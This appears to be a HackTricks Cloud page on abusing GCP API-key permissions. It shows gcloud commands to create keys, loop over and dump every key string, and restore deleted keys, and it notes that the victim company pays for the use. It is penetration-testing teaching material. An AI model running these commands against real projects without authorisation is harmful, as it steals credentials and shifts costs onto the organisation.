{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
The following permissions are useful to create and steal API keys, not this from the docs: An API key is a simple encrypted string that identifies an application without any principal. They are useful for accessing public data anonymously, and are used to associate API requests with your project for quota and billing.
Therefore, with an API key you can make that company pay for your use of the API, but you won't be able to escalate privileges.
For more information about API Keys check:
{% content-ref url="../gcp-services/gcp-api-keys-enum.md" %} gcp-api-keys-enum.md {% endcontent-ref %}
For other ways to create API keys check:
{% content-ref url="gcp-serviceusage-privesc.md" %} gcp-serviceusage-privesc.md {% endcontent-ref %}
As you might not know which APIs are enabled in the project or the restrictions applied to the API key you found, it would be interesting to run the tool https://github.com/ozguralp/gmapsapiscanner and check what you can access with the API key.
This permission allows to create an API key:
gcloud services api-keys create
Operation [operations/akmf.p7-[...]9] complete. Result: {
"@type":"type.googleapis.com/google.api.apikeys.v2.Key",
"createTime":"2022-01-26T12:23:06.281029Z",
"etag":"W/\"HOhA[...]==\"",
"keyString":"AIzaSy[...]oU",
"name":"projects/5[...]6/locations/global/keys/f707[...]e8",
"uid":"f707[...]e8",
"updateTime":"2022-01-26T12:23:06.378442Z"
}
You can find a script to automate the creation, exploit and cleaning of a vuln environment here.
{% hint style="danger" %} Note that by default users have permissions to create new projects adn they are granted Owner role over the new project. So a user could create a project and an API key inside this project. {% endhint %}
These permissions allows list and get all the apiKeys and get the Key:
for key in $(gcloud services api-keys list --uri); do
gcloud services api-keys get-key-string "$key"
done
You can find a script to automate the creation, exploit and cleaning of a vuln environment here.
These permissions allow you to list and regenerate deleted api keys. The API key is given in the output after the undelete is done:
gcloud services api-keys list --show-deleted
gcloud services api-keys undelete <key-uid>
Check the following page to learn how to do this, although this action belongs to the service clientauthconfig
according to the docs:
{% content-ref url="../../workspace-security/gws-google-platforms-phishing/" %} gws-google-platforms-phishing {% endcontent-ref %}
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.